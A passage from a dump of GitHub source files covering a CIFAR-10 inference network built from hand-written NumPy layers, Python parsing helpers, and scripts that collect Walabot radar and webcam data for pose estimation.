:<string> sep: field separator\n :<integer> n: tuple size (start_index, count)\n :<type> cast: type to cast list elements (e.g. set)\n :<iterable> return: iterable container of <cast> type\n\n NOTES:\n - if cast == <dict>, elements from the first row are used as keys for each subsequent line\n \"\"\"\n\n # load stream\n file = loadStream(data)\n\n # parse data into n-dim list\n if cast == dict:\n keys = file.readline().split(sep)[n[0]:n[1]]\n data = [ dict(zip(keys, line.rstrip('\\r\\n').split(sep)[n[0]:n[1]])) for line in file ]\n else:\n data = [ cast(line.rstrip('\\r\\n').split(sep)[n[0]:n[1]]) for line in file ]\n\n # close stream\n file.close()\n\n return data\n\ndef inputString(data):\n \"\"\"\n Converts a variable input type to <string> format\n\n :<string> data: path to file or standard input (denoted by '-')\n :<string> return: <string> object\n\n \"\"\"\n\n # load stream\n file = loadStream(data)\n\n # read\n s = file.read().rstrip('\\r\\n')\n\n # close stream\n file.close()\n\n # return string\n return s\n\n# ========== AUXLIARY\n\ndef loadStream(_input):\n \"\"\"\n Load a <file> or <stdin> object\n\n :<string> _input: file path or standard input (denoted as '-')\n :<file> return: open(file, 'r') or sys.stdin stream (WARNING: remember to close it!)\n\n \"\"\"\n\n # open standard input\n if _input == '-':\n file = sys.stdin\n\n # open file stream\n elif os.path.isfile(_input):\n file = open(_input, 'r')\n\n # return invalid input\n else:\n print(\"Invalid input data\", file = sys.sterr)\n exit()\n\n return file\n\n"
},
{
"alpha_fraction": 0.6881287693977356,
"alphanum_fraction": 0.6881287693977356,
"avg_line_length": 26.55555534362793,
"blob_id": "99c182e95ad2999aaf83981f5729acaf22064eed",
"content_id": "9bb2d555228572f5c9ccd3c082633b62aef64fbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 18,
"path": "/_iterable.py",
"repo_name": "davvelsan/src-helpers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExposes methods to handle various iterable structures.\n\n\"\"\"\n\nimport itertools # chain()\n\ndef flatten_iterable(iterable, cast = list):\n \"\"\"\n Flattens a two-dimensional iterable object\n\n :<iterable> iterable: python <iterable> or a class that inherits from it\n :<type> cast: type container to cast the flattened element\n :<iterable> return: a flattened one-dimensional <iterable> object of the same input <type>\n\n \"\"\"\n\n return cast(itertools.chain(*iterable))\n\n"
},
{
"alpha_fraction": 0.6477494835853577,
"alphanum_fraction": 0.6477494835853577,
"avg_line_length": 19.399999618530273,
"blob_id": "e2ba4047d874752d403f52f464404f39f367e1a8",
"content_id": "4c6963ca3a7cd49938bb4d8b1268252f06d3ea0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/_string.py",
"repo_name": "davvelsan/src-helpers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExposes methods to handle strings.\n\n\"\"\"\n\ndef printError(*objs):\n \"\"\"\n Prints <obj> types to the <stderr> stream\n\n :<*objs>: objects to print\n\n \"\"\"\n\n print(*objs, file=sys.stderr)\n\ndef replaceLiterals(string):\n \"\"\"\n Replaces common literal separator characters with their unicode equivalents\n\n :<string> string: string with literal unicode characters\n :<string> return: string with replaced unicode characters\n\n \"\"\"\n\n return string.replace(\"\\\\t\", \"\\t\").replace(\"\\\\n\", \"\\n\")\n\n"
}
] | 3 |
CaptainKey/CIFAR-10-Example
|
https://github.com/CaptainKey/CIFAR-10-Example
|
f1086f67bf3b9b4da6ecff6270cad141eef2a249
|
b497f99dafc47340d30955d8783addcce9f6dfea
|
f2be3f297c8ac00f3b0a981fd59b77f82e9d6c36
|
refs/heads/master
| 2021-01-02T20:31:30.506885 | 2020-02-12T09:23:11 | 2020-02-12T09:23:11 | 239,788,088 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6507772207260132,
"alphanum_fraction": 0.6791018843650818,
"avg_line_length": 35.1875,
"blob_id": "57268f73785897c14f3867b9e4fa0360a3f74883",
"content_id": "636a228db9ca2266d3a7ad690a19d62da416b5a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2917,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 80,
"path": "/main.py",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "import dataset as dt #Importation du module dataset\nimport layers # Importation du module layers\nimport logging as log # Imporation du module logging pour la normalisation\nimport numpy as np # Importation du module numpy\n\n\n\n# Définition de la classe Network qui représente le réseau de neurones\nclass Network:\n \n def __init__(self):\n # Définition des différentes couches nécessaires à l'execution\n self.conv1 = layers.convolution('conv1',[3,32,32],[6,3,5,5],1,bias=True)\n self.pool = layers.maxpooling('maxpooling',2)\n self.conv2 = layers.convolution('conv2',[6,14,14],[16,6,5,5],1,bias=True)\n self.fc1 = layers.linear('fc1',16*5*5,120,bias=True)\n self.fc2 = layers.linear('fc2',120,84,bias=True)\n self.fc3 = layers.linear('fc2',84,10,bias=True)\n self.relu = layers.relu('relu')\n\n def __call__(self,x):\n # Définition de la propagation de l'image dans le réseau\n x = self.pool(self.relu(self.conv1(x)))\n x = self.pool(self.relu(self.conv2(x)))\n x = x.reshape(-1)\n x = self.relu(self.fc1(x))\n x = self.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n\n# Définition du répertoire\npath = \"/home/tanguy/Documents/Cours/M1-Python/1102/base/test_batch.bin\"\n\n# Création de l'instance de la classe dataset\ndata = dt.dataset('CIFAR-10',path)\n# Utilisation de la méthode read_dataset pour lire le fichier binaire\nimgs,labels = data.read_dataset()\n\n# Récupération des différentes classes de la base\nclasses = data.get_classes()\n\n# Instance de réseau\nnet = Network()\n\nnet.conv1.load_weight(np.load('params/conv1.weight.npy'))\nnet.conv2.load_weight(np.load('params/conv2.weight.npy'))\n\nnet.conv1.load_bias(np.load('params/conv1.bias.npy'))\nnet.conv2.load_bias(np.load('params/conv2.bias.npy'))\n\n\nnet.fc1.load_weight(np.load('params/fc1.weight.npy').T)\nnet.fc2.load_weight(np.load('params/fc2.weight.npy').T)\nnet.fc3.load_weight(np.load('params/fc3.weight.npy').T)\n\nnet.fc1.load_bias(np.load('params/fc1.bias.npy'))\nnet.fc2.load_bias(np.load('params/fc2.bias.npy'))\nnet.fc3.load_bias(np.load('params/fc3.bias.npy'))\n\n# Boucle sur les images et labels de la base\nfor label,img in zip(labels,imgs):\n # Affichage de l'image courane\n data.display_dataset(img,label)\n # Propagation de l'image dans le réseau\n output = net(img)\n\n # Visualisation des scores de sortie\n print('Netoutput => ',output)\n\n # Récupération de l'indice du maximum dans le vecteur de score\n prediction = output.argmax()\n\n print('Network prediction : {} => {}'.format(prediction, classes[prediction]))\n print('Truth : {} => {}'.format(label,classes[label]))\n\n # Insertion dans les logs de la prédiction du réseau et du label\n log.info('Network prediction : {} => {}'.format(prediction, classes[prediction]))\n log.info('Truth : {} => {}'.format(label,classes[label]))\n exit(0)\n"
},
{
"alpha_fraction": 0.5613174438476562,
"alphanum_fraction": 0.5795375108718872,
"avg_line_length": 31.43181800842285,
"blob_id": "237e766af3c19aa0a5fefe86fafc4c631cbe2c6d",
"content_id": "78692ddd505c18cd9612b7299bec0841154991bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2861,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 88,
"path": "/dataset/__init__.py",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport matplotlib.pyplot as plt\nimport logging as log \nimport argparse\n\n# Classe de la base de donnée\nclass dataset:\n \n # Initialisation\n def __init__(self,name,path):\n self.name = name\n self.path = path\n self.classes = ['airplane','automobile','bird','cat','deer','dog','frog','horse','ship','truck']\n log.info('init - {}'.format(self.name))\n self.display_classes()\n\n # Méthode pour lire le fichier binaire\n def read_dataset(self):\n log.info('iread_dataset - {}'.format(self.name))\n\n labels = []\n imgs = []\n with open(self.path,\"rb\") as file:\n for j in range(10000):\n byte = file.read(1)\n labels.append(int.from_bytes(byte,byteorder='big'))\n byte_array = file.read(3072)\n img = [byte for byte in byte_array]\n imgs.append(np.array(img,'uint8').reshape(3,32,32))\n return imgs,labels\n\n # Méthode qui permet l'affichage d'une image de la base\n def display_dataset(self,img,label):\n log.info('display_dataset - {}'.format(self.name))\n\n shape = img.shape\n rgb = np.array([ [ [img[0][i][j],img[1][i][j],img[2][i][j]] for j in range(shape[2])] for i in range(shape[1])]) \n\n plt.suptitle(' CIFAR -10 : {}'.format(self.classes[label]), y=0.8)\n ax = plt.subplot(1,4,1)\n ax.set_title('RGB')\n ax.axis('off')\n plt.imshow(rgb)\n\n ax = plt.subplot(1,4,2)\n ax.set_title('R')\n ax.axis('off')\n plt.imshow(img[0],cmap='Reds')\n\n ax = plt.subplot(1,4,3)\n ax.set_title('G')\n ax.axis('off')\n plt.imshow(img[1],cmap='Greens')\n\n ax = plt.subplot(1,4,4)\n ax.set_title('B')\n ax.axis('off')\n plt.imshow(img[2],cmap='Blues')\n\n plt.show()\n\n def get_classes(self):\n return self.classes\n\n # Affiche les différentes classes\n def display_classes(self):\n log.info(\"Classes\")\n for key,value in enumerate(self.classes):\n log.info('{} => {}'.format(key,value))\n\n\n\"\"\"\n Le code ci-dessous est executé si et seulement si c'est le module qui est executé\n ex : python3 __init__.py --path /home/tanguy/Documents/Cours/M1-Python/1102/base/data_batch_1.bin\n\"\"\"\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Read and display CIFAR-10')\n # Définition de/des arguments\n parser.add_argument('--path', metavar='float', type=str, nargs='?',required=True,help='Path to .bin files')\n # Parse des arguments\n args = parser.parse_args()\n\n # Execution d'un code pour lire la base et afficher une image\n data = dataset('CIFAR-10',args.path)\n imgs,labels = data.read_dataset()\n for label,img in zip(labels,imgs):\n data.display_dataset(img,label)\n exit(0)\n"
},
{
"alpha_fraction": 0.6315789222717285,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 18,
"blob_id": "a0dec0b378bff7355be686c0b58905bb6d0923f4",
"content_id": "041a6293806e149d372612b34da19c8d404c360a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 19,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 1,
"path": "/README.md",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "# CIFAR-10-Example\n"
},
{
"alpha_fraction": 0.5403634905815125,
"alphanum_fraction": 0.5462806224822998,
"avg_line_length": 33.54744338989258,
"blob_id": "8a8ed7079bd12b411878867bb0d9a8edc8083e6b",
"content_id": "812fc41a9402e157d314f4a9a09547f21904798f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4732,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 137,
"path": "/layers/__init__.py",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "import random \nimport numpy as np\nimport logging as log\n\nlog.basicConfig(filename='debug.log',format='%(levelname)s : %(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',level=log.INFO,filemode='w')\n\n\"\"\"\n convolution\n\"\"\"\nclass convolution:\n \n def __init__(self,name,img_size,kernel,stride,bias=False):\n self.name = name\n self.img_size = img_size\n self.kernel = kernel \n self.stride = stride \n self.output_size = int(((img_size[2] - (kernel[3] - 1) - 1) / stride))+ 1\n self.weight = np.array( [ [ [ [random.random() for i in range(kernel[3])] for i in range(kernel[2]) ] for j in range(kernel[1])] for k in range(kernel[0])] )\n\n if bias:\n self.bias = np.array([random.random() for i in range(kernel[0])])\n else:\n self.bias = bias\n\n log.info('init - {}'.format(self.name))\n \n def __call__(self,img):\n log.debug('call - {}'.format(self.name))\n img = np.array(img)\n output = np.zeros((self.kernel[0],self.output_size,self.output_size))\n for f in range(self.kernel[0]):\n for c in range(self.img_size[0]):\n for i in range(0,self.output_size):\n for j in range(0,self.output_size):\n for m in range(self.kernel[3]):\n for n in range(self.kernel[3]):\n output[f][i][j] += img[c][i+m][j+n]*self.weight[f][c][m][n]\n if self.bias.all(): output[f][i][j] += self.bias[f]\n return output\n\n def load_weight(self,weight):\n log.debug('load_weight - {}'.format(self.name))\n assert self.weight.shape == weight.shape, log.error('load_weight {}'.format(self.name))\n self.weight = weight\n\n def load_bias(self,bias):\n log.debug('load_bias - {}'.format(self.name))\n assert self.bias.shape == bias.shape, log.error('load_bias {}'.format(self.name))\n self.bias = bias\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name\n\n\"\"\"\n linear\n\"\"\"\nclass linear:\n def __init__(self,name,dim_in,dim_out,bias=False):\n self.name = name\n self.dim_in = dim_in\n self.dim_out = dim_out \n self.weight = np.random.rand(dim_in,dim_out)\n self.bias = np.random.random(dim_out) if bias else False \n\n log.info('init - {}'.format(self.name))\n\n def __call__(self,vecteur):\n log.debug('call - {}'.format(self.name))\n output = np.zeros(self.dim_out)\n for i in range(self.dim_in):\n for j in range(self.dim_out):\n output[j] += vecteur[i]*self.weight[i][j]\n if self.bias.all(): output[j] += self.bias[j]\n\n return output\n\n def load_weight(self,weight):\n log.debug('load_weight - {}'.format(self.name))\n assert self.weight.shape == weight.shape, log.error('load_weight {}'.format(self.name))\n self.weight = weight\n\n def load_bias(self,bias):\n log.debug('load_bias - {}'.format(self.name))\n assert self.bias.shape == bias.shape, log.error('load_bias {}'.format(self.name))\n self.bias = bias\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name\n\"\"\"\n Maxpooling\n\"\"\"\nclass maxpooling:\n def __init__(self,name,kernel_size):\n self.name = name\n self.kernel_size = kernel_size\n log.info('init - {}'.format(self.name))\n\n def __call__(self,img):\n log.debug('call - {}'.format(self.name))\n shape = img.shape\n output_size = int(shape[1]/self.kernel_size)\n output = np.array([])\n for channels in range(shape[0]):\n for height in range(0,shape[1],self.kernel_size):\n for width in range(0,shape[2],self.kernel_size):\n maximum = img[channels][height][width]\n for m in range(0,self.kernel_size):\n for n in range(0,self.kernel_size):\n if img[channels][height+m][width+n] > maximum : maximum = img[channels][height+m][width+n]\n\n output = np.append(output,maximum)\n\n output = output.reshape((shape[0],output_size,output_size))\n return output\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name\n\"\"\"\n relu\n\"\"\"\nclass relu:\n def __init__(self,name):\n self.name = name\n log.info('init - {}'.format(self.name))\n\n def __call__(self,x):\n log.debug('call - {}'.format(self.name))\n x[x < 0] = 0\n\n return x\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name"
}
] | 4 |
clo64/data_scripts
|
https://github.com/clo64/data_scripts
|
d3aa759c1fc882ef411bf0a1e5f65dcd6678a11d
|
76aeac06da33a36e95c8996244477a5ea9f02515
|
01fe32f12cd92ae242b489df3ba8a21ee2f091e5
|
refs/heads/master
| 2022-10-14T03:20:15.153082 | 2020-06-09T12:07:34 | 2020-06-09T12:07:34 | 267,169,817 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6867470145225525,
"alphanum_fraction": 0.7028112411499023,
"avg_line_length": 26.77777862548828,
"blob_id": "b90ef19ab02a8b04f635d60ec50b90a5f3278010",
"content_id": "f10812d8af9a53d58c7b909f656827afc198b77c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 249,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/data_collector/json_Stream_test.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import jsonstreams\n\nwith jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:\n s.write('foo', 'bar')\n\ns2 = jsonstreams.Stream(jsonstreams.Type.object, filename='Hi')\ns2.write('too', ['threw'])\ns2.write('welcome', ['hell'])\ns2.close()"
},
{
"alpha_fraction": 0.6061643958091736,
"alphanum_fraction": 0.6541095972061157,
"avg_line_length": 15.277777671813965,
"blob_id": "220cac2b86e678a3e613134152c63c07e6a6e56d",
"content_id": "a89bba9b163ebee1ebc6600b6de708efc0401e05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 18,
"path": "/camera_script/camera_script.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import cv2 as cv\nimport keyboard\n\ncap = cv.VideoCapture(0)\n\nfourcc = cv.VideoWriter_fourcc(*'mp4v')\n\nvideo_out = cv.VideoWriter('vidTest.mp4', fourcc, 20.0, (640, 480))\n\nwhile True:\n\n ret, frame = cap.read()\n\n cv.imshow('frame', frame)\n\n k = cv.waitKey(1)\n\n video_out.write(frame)"
},
{
"alpha_fraction": 0.5212915539741516,
"alphanum_fraction": 0.5446888208389282,
"avg_line_length": 32.359375,
"blob_id": "1bd28291f3e82869bff8c019c29f1d6836304349",
"content_id": "54eec17de623b4b77e62b5deaa9cd114ae9cad2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2137,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 64,
"path": "/data_processor/data_processor_functions.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSet of functions to aid in processing video and RF files\n\"\"\"\nimport os.path\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport json\n\nPATHRAWDATA = '../data/raw/'\nPATHPROCCDATA = '../data/processed/'\nVIDNAME = 'rbg_'\nVIDEXT = '.mp4'\nFRAMENAME = 'framedata_'\nFRAMEEXT = '.json'\n\ndef verifyDataFiles(start, end):\n\n print('Verifying all files exist...')\n\n for i in range(int(start), int(end)+1):\n vidName = PATHRAWDATA + VIDNAME + str(i) + VIDEXT\n frameDataName = PATHRAWDATA + FRAMENAME + str(i) + FRAMEEXT\n\n #Check for all video files\n if(os.path.exists(vidName)):\n flag = 'found'\n print('{0:35}... {1:6}'.format(vidName, flag))\n else:\n flag = 'failed'\n print('{0:35}... {1:6}'.format(vidName, flag))\n print(vidName + ' not found, check files')\n exit()\n\n #Check for all frame data files\n if(os.path.exists(frameDataName)):\n flag = 'found'\n print('{0:35}... {1:6}'.format(frameDataName, flag))\n else:\n flag = 'failed'\n print('{0:35}... {1:6}'.format(frameDataName, flag))\n print(frameDataName + ' not found, check files')\n exit()\n\n #**Check for RF data files in future**\n \ndef plotProbMap(probmap, frame):\n plt.imshow(cv.cvtColor(frame, cv.COLOR_BGR2RGB))\n plt.imshow(probmap, alpha=0.6)\n plt.pause(.03)\n plt.show()\n\ndef MPIBodyParts():\n return { \"Head\": 0, \"Neck\": 1, \"RShoulder\": 2, \"RElbow\": 3, \"RWrist\": 4,\n \"LShoulder\": 5, \"LElbow\": 6, \"LWrist\": 7, \"RHip\": 8, \"RKnee\": 9,\n \"RAnkle\": 10, \"LHip\": 11, \"LKnee\": 12, \"LAnkle\": 13, \"Chest\": 14,\n \"Background\": 15 }\n\ndef MPIPosePairs():\n return [ [\"Head\", \"Neck\"], [\"Neck\", \"RShoulder\"], [\"RShoulder\", \"RElbow\"],\n [\"RElbow\", \"RWrist\"], [\"Neck\", \"LShoulder\"], [\"LShoulder\", \"LElbow\"],\n [\"LElbow\", \"LWrist\"], [\"Neck\", \"Chest\"], [\"Chest\", \"RHip\"], [\"RHip\", \"RKnee\"],\n [\"RKnee\", \"RAnkle\"], [\"Chest\", \"LHip\"], [\"LHip\", \"LKnee\"], [\"LKnee\", \"LAnkle\"] ]\n\n\n"
},
{
"alpha_fraction": 0.6702290177345276,
"alphanum_fraction": 0.7038167715072632,
"avg_line_length": 19.80645179748535,
"blob_id": "7b4336210b8d037bd2372188f3e80bbe3f12c2cd",
"content_id": "1ac7752957bcc835905e9dc0302bd3629441fa70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 31,
"path": "/data_processor/read_walabot_json.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nQuick practice script to learn how to use ijson\n\nGoal is to read very large JSON files without loading into\nmemory\n\nnote: ijson likes files opened in binary format\n\"\"\"\n\nimport ijson\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport rasterio\n\nmin_R, max_R, res_R = 30, 200, 4\nmin_Theta, max_Theta, res_Theta = -40, 40, 4\nmin_Phi, max_Phi, res_Phi = -40, 40, 4\n\n# rb flag opens file in binary\njson_to_parse = open('../data/raw/wala_1.json', 'rb')\n\ntest_object = ijson.items(json_to_parse, '25')\n\n1\n\nprint(wala_data_array)\nprint(wala_data_array.shape)\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\n\n\n \n\n\n"
},
{
"alpha_fraction": 0.6790894269943237,
"alphanum_fraction": 0.6941982507705688,
"avg_line_length": 27.86046600341797,
"blob_id": "e49dc41c81b9b528bc48ca05b4402edafb46ff56",
"content_id": "cce717bdfbf745326e0388f1ef18bd94279e9ad7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4964,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 172,
"path": "/data_collector/data_collector.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWriting for webcam data collection until\nwalabot is received\n\nijson can be used for iterative parsing\nLooks like possibly jsonstreams, but it's in beta... See if it works anyway???\n\"\"\"\nimport matplotlib.pyplot as plt\nimport WalabotAPI as wala\nimport cv2 as cv\nimport numpy as np\nfrom datetime import datetime\nimport json\nimport jsonstreams\nimport time\nimport argparse\nimport os.path\nimport threading\nimport keyboard\n\n# Argument parsing block to receive data session number as integer.\n # Script expects input as -datasession <integer>\n # Input defines common file name association for \n # video, timestamp and walabot\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-datasession', action='store', dest='datasession', type=str, help='Enter the data session number -datasession <integer>',\nrequired=True)\nparse_results = parser.parse_args()\n\n# Check to ensure datasession files don't already exist\n\nif(os.path.exists('../data/raw/framedata_' + parse_results.datasession + '.json') or (os.path.exists('../data/raw/rbg_' + parse_results.datasession + '.mp4'))):\n print('Data session files already exist, cannot overwrite')\n exit()\n\n# Walbot Initialization\n # SetProfile is chosen from a number of options, see Walabot API\n # SetThreshold defines the minimum reflected power to be imaged\n # SetDynamicImageFilter is chosen from a number of options, see walabot API\n\nTHRESHOLD = 15\n\nwala.Init()\nwala.SetSettingsFolder()\nwala.ConnectAny()\nwala.SetProfile(wala.PROF_SENSOR)\nwala.SetThreshold(THRESHOLD)\nwala.SetDynamicImageFilter(wala.FILTER_TYPE_NONE)\n\n# Walabot 'Arena' settings\n # *_R values define spherical radial distance of imaging\n # All res_* values determine angle in degrees between antenna \n # Some Arena settings commented out for testing\n\nmin_R, max_R, res_R = 216, 457, 5\nwala.SetArenaR(min_R, max_R, res_R)\n\nmin_Theta, max_Theta, res_Theta = -19, 19, 5\nwala.SetArenaTheta(min_Theta, max_Theta, res_Theta)\n\nmin_Phi, max_Phi, res_Phi = -43, 43, 5\nwala.SetArenaPhi(min_Phi, max_Phi, res_Phi)\n\n\n# Start Walabot and perform calibration\n\nwala.Start()\nwala.StartCalibration()\n\ncalibration_status, calibration_progress = wala.GetStatus()\nwala.Trigger()\n\nwhile calibration_status == wala.STATUS_CALIBRATING and calibration_progress < 100:\n wala.Trigger()\n print(\"Calibrating \" + str(calibration_progress) + '%')\n calibration_status, calibration_progress = wala.GetStatus()\n\n# Initialize video camera. Wait 1 second for 'warmup'\n\ncap = cv.VideoCapture(1)\ntime.sleep(1)\n\n# WebCam capture dimensions, a cv2 method\n\ncap.set(3, 640)\ncap.set(4, 480)\n\n# Video Codec settings. See fourcc.org for more info\n\nfourcc = cv.VideoWriter_fourcc(*'mp4v')\n\n# Set write path destination for video output, Walabot and timestamp\n\nvideo_out = cv.VideoWriter('../data/raw/rbg_' + parse_results.datasession + '.mp4', fourcc, 20.0, (640, 480))\ntime_stamp_out = jsonstreams.Stream(jsonstreams.Type.object, filename='../data/raw/framedata_' + parse_results.datasession + '.json')\nwala_out = jsonstreams.Stream(jsonstreams.Type.object, filename='../data/raw/wala_' + parse_results.datasession + '.json')\n\n# frame_count used to incrimente every loop, matches frame captures\n\nframe_count = 1\n\n\"\"\"\nax1 = plt.subplot(1, 1, 1)\nret, frame = cap.read()\nfirst_image = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\nim1 = ax1.imshow(first_image)\n\"\"\"\n\nwhile True:\n\n # Trigger the walabot for a frame, then read a camera frame\n # wala.GetRawImage return the 3D image, refer to Walabot API for function details\n \n start = time.time()*1000\n wala.Trigger()\n ret, frame = cap.read()\n\n #wala_data, sizeX, sizeY, depth, power = wala.GetRawImage()\n \n wala_data = wala.GetRawImage()\n \n # Write a single video frame to file then\n # write a single walabot entry to the json stream\n \n wala_out.write(str(frame_count), wala_data)\n video_out.write(frame)\n time_stamp_out.write(str(frame_count), [ str(datetime.now()) ] )\n \n\n frame_count += 1\n\n cv.imshow('frame', frame)\n\n end = time.time()*1000\n print(end-start)\n \n\n # Periodically update walabot visualization with 2D slice\n\n \"\"\"\n if frame_count%8 == 0:\n try:\n wala_data_slice, sizeX, sizeY, depth, power = wala.GetRawImageSlice()\n plt.imshow(wala_data_slice)\n plt.pause(0.05)\n except:\n print(\"closing matplotlib\")\n \"\"\"\n\n #cv.imshow('frame', frame)\n #frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n #im1.set_data(frame)\n #plt.pause(.05)\n \n if(keyboard.is_pressed('q')):\n # Close the jsonstreams objects, this adds the closing '}' to the file\n time_stamp_out.close()\n wala_out.close()\n\n # Take a quick break, walabot\n wala.Disconnect()\n wala.Clean()\n\n # Close out the cv objects, go home, go to sleep. Goodnight.\n cap.release()\n cv.destroyAllWindows()\n break\n \n#plt.ioff()\n\n#start = time.time()\n"
},
{
"alpha_fraction": 0.575025200843811,
"alphanum_fraction": 0.6263846755027771,
"avg_line_length": 21.56818199157715,
"blob_id": "6ae79b5dd8204eedf46550bf1e733193016dd6e9",
"content_id": "7734dd62a8412550f85ad42c279a4f8a63bc6b94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 44,
"path": "/openpose_testing/openpose_testing.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import cv2 as cv\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport os.path\n\nPATHRAWDATA = '../data/raw/'\nVIDNAME = 'rbg_'\nVIDEXT = '.mp4'\nFRAMENAME = 'framedata_'\nFRAMEEXT = '.json'\n\nbody_parts = { \"Head\": 0, \"Neck\": 1, \"RShoulder\": 2, \"RElbow\": 3, \"RWrist\": 4,\n \"LShoulder\": 5, \"LElbow\": 6, \"LWrist\": 7, \"RHip\": 8, \"RKnee\": 9,\n \"RAnkle\": 10, \"LHip\": 11, \"LKnee\": 12, \"LAnkle\": 13, \"Chest\": 14,\n \"Background\": 15 }\n\nimageName = 'simple_pose.jpg'\n\ncap = cv.imread(os.path.relpath(imageName))\n\nnet = cv.dnn.readNet(os.path.relpath('openpose_pose_mpi_faster_4_stages.prototxt'), \n os.path.relpath('pose_iter_160000.caffemodel'))\n\nheight, width, depth = cap.shape\n\nprint(height)\nprint(width)\nprint(depth)\n\nblob = cv.dnn.blobFromImage(cap, 1.0 / 255, (640, 480), (0, 0, 0), swapRB=False, crop=False)\n\nnet.setInput(blob)\n\nout = net.forward()\n\nprint(out[0, 0, :, :])\n\nprint(out.shape)\n\nprint(out.shape[3])\n\ncv.imshow('map', out[0, 0])\n\nk = cv.waitKey(0)\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7458646893501282,
"avg_line_length": 21.200000762939453,
"blob_id": "c79d2916bada9f1b07050b77ba261316a8d0a1d4",
"content_id": "86529ca01807fd30de1aeb94f7d3493e73674917",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 665,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 30,
"path": "/walabot_testing/walabot_resolution_validation.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import WalabotAPI as wala\nimport time\nimport keyboard\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \nimport time\n\nTHRESHOLD = 15\n\nwala.Init()\nwala.SetSettingsFolder()\nwala.ConnectAny()\nwala.SetProfile(wala.PROF_SENSOR)\nwala.SetThreshold(THRESHOLD)\nwala.SetDynamicImageFilter(wala.FILTER_TYPE_NONE)\n\nmin_R, max_R, res_R = 216, 457, 2\nwala.SetArenaR(min_R, max_R, res_R)\n\nmin_Theta, max_Theta, res_Theta = -19 , 19, 2\nwala.SetArenaTheta(min_Theta, max_Theta, res_Theta)\n\nmin_Phi, max_Phi, res_Phi = -43, 43, 2\nwala.SetArenaPhi(min_Phi, max_Phi, res_Phi)\n\ntry:\n wala.Start()\nexcept:\n print('resoltuion out of bounds')"
},
{
"alpha_fraction": 0.6274510025978088,
"alphanum_fraction": 0.6764705777168274,
"avg_line_length": 16.16666603088379,
"blob_id": "bb0390350cdfa4fb7c3276a1a893be5dac7b5f1b",
"content_id": "b2bc3c6c57422ee93dcff62c0aceee239805f9b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
